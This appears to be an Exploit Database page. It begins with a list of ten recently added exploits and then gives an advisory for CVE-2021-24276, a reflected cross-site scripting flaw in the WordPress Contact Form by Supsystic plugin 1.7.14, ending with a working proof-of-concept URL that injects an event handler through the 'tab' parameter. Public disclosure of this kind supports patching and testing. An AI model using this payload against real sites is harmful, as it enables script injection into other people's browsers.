
10 changes to exploits/shellcodes Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) FatPipe Networks WARP 10.2.2 - Authorization Bypass FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated) WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
13 lines
No EOL
622 B
Text
13 lines
No EOL
622 B
Text
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
|
|
# Date: 3/28/2021
|
|
# Author: 0xB9
|
|
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
|
|
# Version: 1.7.14
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2021-24276
|
|
|
|
1. Description:
|
|
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
|
|
|
|
2. Proof of Concept:
|
|
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)// |